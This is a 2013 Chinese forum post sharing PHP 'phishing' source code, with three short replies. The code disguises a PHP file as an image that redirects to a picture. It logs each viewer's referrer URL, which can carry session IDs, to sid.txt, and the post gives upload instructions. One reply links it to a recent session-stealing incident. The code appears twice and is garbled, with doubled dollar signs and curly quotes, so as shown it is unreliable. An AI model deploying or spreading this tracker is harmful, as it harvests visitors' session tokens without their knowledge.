edit_note帖子
251
stars积分
393,143
event加入
2011-07-09
休闲灌水
PHP钓鱼源码分享
schedule发表于 2013-04-01 23:35:00
visibility查看 334
chat_bubble回复 3
#1 楼主
<?
$$$$id=rand(1,1);
$$$$image[1]=‘wx.gif‘;
header(“location:$$$$image[$$$$id]“);
?>
<?php
Header(“Content-type: image/php“);
$$$$url=$$$$_SERVER[‘HTTP_REFERER‘];
$$$$time=date(“Y-m-d H:i:s“);
$$$$file=fopen(“sid.txt“,“a+“);
fwrite($$$$file,str_pad($$$$url,15,“ “,1).“ “.$$$$time.“\n“);
fclose($$$$file);
?>
笔记本输入后改扩展名为php,上传空间,WX.gif为钓鱼图片,钓到的将会以sid.txt形式存在
$$$$id=rand(1,1);
$$$$image[1]=‘wx.gif‘;
header(“location:$$$$image[$$$$id]“);
?>
<?php
Header(“Content-type: image/php“);
$$$$url=$$$$_SERVER[‘HTTP_REFERER‘];
$$$$time=date(“Y-m-d H:i:s“);
$$$$file=fopen(“sid.txt“,“a+“);
fwrite($$$$file,str_pad($$$$url,15,“ “,1).“ “.$$$$time.“\n“);
fclose($$$$file);
?>
笔记本输入后改扩展名为php,上传空间,WX.gif为钓鱼图片,钓到的将会以sid.txt形式存在
全部回复 (3)
2013-04-01 23:41:00
沙发
超级简单,前几天那个串号的(苍老师,红肚兜)就是这个源码
2013-04-02 07:13:00
板凳
源码呢?
2013-04-02 11:23:00
地板
2楼瞎了吗??
登录 后才能回复
flag举报帖子